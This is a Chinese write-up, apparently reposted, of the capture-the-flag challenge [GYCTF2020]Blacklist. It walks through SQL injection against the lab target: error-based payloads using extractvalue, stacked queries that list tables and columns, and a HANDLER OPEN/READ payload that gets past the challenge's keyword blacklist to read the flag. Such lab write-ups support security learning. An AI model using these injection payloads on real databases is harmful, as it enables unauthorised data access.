輸入1或者2會(huì)返回一個(gè)數(shù)組
隨后輸入1’ union select 1,database()–+返回了過(guò)濾掉的語(yǔ)句

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

嘗試報(bào)錯(cuò)注入：
輸入

or extractvalue(1,concat(user(),0x7e,version()))

隨后輸入

1' and extractvalue(1,concat('~',database()))--+

隨后使用堆疊注入
堆疊注入與union聯(lián)合注入的區(qū)別在于堆疊注入可以執(zhí)行任意語(yǔ)句，而且它只會(huì)顯示第一條語(yǔ)句的結(jié)果，其余語(yǔ)句出錯(cuò)什么的沒有任何影響
輸入

3';use supersqli;show tables;

結(jié)果

隨后查詢字段
輸入

3‘;use supersqli;show columns from `FlagHere';--+

結(jié)果：

接下來(lái)查詢flag字段的內(nèi)容

-1';use supersqli;Select `flag` from `FlagHere`;#

想了各種方法都無(wú)法繞過(guò)
后來(lái)去查看了大佬的blog

1'; HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#

HANDLER … OPEN語(yǔ)句打開一個(gè)表，使其可以使用后續(xù)HANDLER … READ語(yǔ)句訪問(wèn)，該表對(duì)象未被其他會(huì)話共享，并且在會(huì)話調(diào)用HANDLER … CLOSE或會(huì)話終止之前不會(huì)關(guān)閉
成功看到了flag
大佬np，是在下淺薄了
附上大佬博客鏈接：
https://www.cnblogs.com/gaonuoqi/p/12398554.html

總結(jié)

以上是生活随笔為你收集整理的[GYCTF2020]Blacklist的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。